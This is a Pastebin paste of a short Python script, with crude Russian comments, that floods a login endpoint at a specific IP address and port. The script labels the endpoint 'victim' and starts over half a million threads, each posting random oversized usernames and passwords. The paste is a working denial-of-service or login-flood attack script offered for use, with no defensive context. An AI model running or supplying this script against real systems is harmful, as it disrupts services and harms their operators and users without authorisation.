Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from requests import post
- from threading import Thread
- from secrets import token_hex
- # Сюда
- victim = 'http://5.42.64.41:1234/api/public/login'
- def hit():
- payload = dict(username=token_hex(256), password=token_hex(256))
- response = post(victim, json=payload)
- print(response.text)
- threads = [Thread(target=hit) for _ in range(512 * 1024)]
- # Начинаем громко срать
- for t in threads:
- t.start()
- # Смываем унитаз
- for t in threads:
- t.join()
Advertisement
Add Comment
Please, Sign In to add comment